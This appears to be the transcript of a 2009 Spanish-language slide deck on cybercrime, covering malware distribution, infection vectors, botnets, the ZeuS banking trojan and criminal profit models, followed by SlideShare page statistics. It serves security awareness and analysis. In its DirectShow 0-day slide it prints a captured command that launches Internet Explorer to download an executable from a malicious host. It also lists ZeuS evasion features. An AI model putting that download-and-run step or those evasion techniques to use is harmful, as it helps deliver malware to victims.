Cibercrimen Fraude Y Malware Mikel Gastesi

*[ CIBERCRIMEN: FRAUDE Y MALWARE ] Autor: Mikel Gastesi Urroz mgastesi@s21sec.com Fecha: 10-07-2009

Confidencialidad La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización. Pág. 2

Índice Introducción - ¿Cibercrimen? Evolución Distribución Infección Botnets • ZeuS/Zbot Money, money, money Pág. 3

INTRODUCCIÓN - ¿CIBERCRIMEN? Pág. 4

¿CIBERCRIMEN?

EVOLUCIÓN (de la mentalidad)

EVOLUCION 1 persona • Ataques dirigidos • Recursos limitados Grupos profesionales • Ataques indiscriminados/masivos • Muchos recursos técnicos

EVOLUCIÓN Cambio de objetivos Inicios: Ataques al servidor • Necesidad de pocos recursos • Mayor conciencia de seguridad Ahora: Ataque a los clientes • Necesidad de manejar mucha información • Necesidad de una infraestructura tecnológica • Poca conciencia de seguridad

EVOLUCIÓN 1 servidor • Búsqueda de vulnerabilidades • Atacante trata de acceder al servidor N clientes • Vulnerabilidades conocidas • Victima accede al vector de infección • ¿Phishing? → Malware!!!

DISTRIBUCIÓN

DISTRIBUCIÓN El malware acude a la víctima • SPAM • Búsqueda y robo de contactos • P2P • Ingeniería social • Descargas con “regalo”

EJ. SPAM

DISTRIBUCIÓN La víctima acude al malware • Páginas fraudulentas • Falsos antivirus • Falsas páginas de vídeos • Páginas comprometidas • Páginas legítimas atacas indiscriminadamente

EJ. FAKE AV

DISTRIBUCIÓN Página comprometida, ¿cómo? • Nine ball: 40000 páginas comprometidas • Cuentas FTP • Diccionario/Brute force • SQL injection • RFI • Exploits recientes, 0-days

SQL INJECTION MASIVO

INFECCIÓN

INFECCIÓN Software vulnerable • Sistema Operativo • Navegador • Complementos • Flash • PDF... TODO programa que interactúe con el exterior es una POSIBLE víctima.

UNAS ESTADÍSTICAS... [secunia]

INFECCIÓN

INFECCIÓN Víctima “vulnerable” • Ejecución de ficheros adjuntos • Doble extensión (.doc______.exe) Confianza en la página • Codecs No siempre se está a salvo teniendo todo el software actualizado • 0-days • Ventana de tiempo de los antivirus

INFECCIÓN Microsoft DirectShow 0-day (msvidctl.dll) • Páginas comprometidas • Inyecta 8oy4t.8866.org/aa/go.jpg • Muchos exploits, entre ellos el 0day • 2000, 2003 y XP vulnerables • Ejecuta: C:[%programfiles%]Internet Exploreriexplore.exe "http://milllk.com/wm/svchost.exe" • Detectado por solamente por 2 AV (VirusTotal) • Por ahora, v0.1 http://www.securityfocus.com/bid/35558 http://www.csis.dk/en/news/news.asp?tekstID=799 http://www.microsoft.com/technet/security/advisory/97 2890.mspx

INFECCIÓN La cadena es tan fuerte como el eslabón más débil

BOTNETS

BOTNETS Uso: • Proxy • Ataques DdoS • Obtención de credenciales • Hosting • SPAM • Supercomputadora • ...

BOTNETS No solo PCs Botnets ocultas tras Bullet-proof ISP • No responden a avisos de abuso • Alojan paneles de control • Alojan vectores de infección y malware • Fraudulento

TROYANOS BANCARIOS - ZeuS

TROYANOS BANCARIOS Silenciosos Distribución masiva Botnet Robar credenciales MitB ¿Por qué no más? ¡Es gratis! • Control de la máquina • Proxy • … Programado por humanos • Parámetros • Idioma, user-agent...

TROYANOS BANCARIOS Actores • Sinowal • Torpig • Buena ocultación • Generación de dominios mediante algoritmo • Arrestos • BankPatch • MitB • ZeuS • Más sencillo • Ocultación user-mode • ¡El rey del mambo!

ZEUS Finales 2006 • Simple bot • ~3000$ Principios 2007 • Se hace popular • ~700$ Finales 2007 • Versiones personalizadas Mediados 2008 • Vulnerabilidades • Implementaciones en paralelo 2009 • Vulnerabilidades corregidas • Soporta parcialmente IPv6...

ZEUS – CAMBIOS IMPORTANTES Corrección de bugs • Mal saneamiento de parámetros • Escritura de ficheros • ¡Guerra! 10-12-2008 → RC4 • Local data requests to the server and the configuration file can be encrypted with RC4 key depending on your choice

ZEUS Distribución • SPAM • Facturas • E-cards • Michael Jackson • Kits de exploits

ZEUS - CARACTERÍSTICAS Bot Actualización configuración Actualización del binario /etc/hosts Socks proxy Inyección HTML Redirección HTML Capturas de pantalla Capturas de teclados virtuales Captura de credenciales Robo certificados KillOS

ZEUS - TODO Compatibility with Windows Vista and Windows 7 Improved WinAPI hooking Random generation of configuration files to avoid generic detection Console-based builder Version supporing 64 bit processors Full IPv6 support Detailed statistics on antivirus software and firewalls installed on the infected machines

ZEUS - FICHEROS 1.0.x.x • ntos.exe • wnspoemaudio.dll • wnspoemvideo.dll … … 1.2.x.x • sdra64.exe • lowseclocal.ds • lowsecaudio.ds ¿1.3.x.x? • bootwindows.exe • skype32win32post.dll • skype32win64post.dll

ZEUS Config file: • Cifrado con RC4 • Update binary • Url C&C server • Advanced configuration • Webfilters • WebFakes • WebInjects

ZEUS Ficheros de datos • Cifrado RC4 al servidor • Cifrado. For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2

ZEUS - C&C

ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control

Zeus – C&C Opciones • Botnet : Bots online • Botnet : Comandos remotos • Logs : Búsqueda • Logs : Ficheros subidos • System : Perfil • System : Opciones

ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD

MONEY, MONEY, MONEY

LUCRO Crear malware y venderlo Crear botnet y alquilarla Obtención de credenciales y venderlas Obtención de dinero gracias a las credenciales

LUCRO Transferencias Compra de bienes • Físicos • Virtuales Subastas ...deja volar tu imaginación

*[ MUCHAS GRACIAS ] Pág. 61

http://www.elladodelmal.com	949
http://elladodelmal.blogspot.com	136
http://www.slideshare.net	3
http://www.techgig.com	1

Cibercrimen Fraude Y Malware Mikel Gastesi

by Chema Alonso on Jul 18, 2009

Accessibility

Categories

Tags

Upload Details

Usage Rights

4 Embeds 1,089

Statistics

Cibercrimen Fraude Y Malware Mikel Gastesi — Presentation Transcript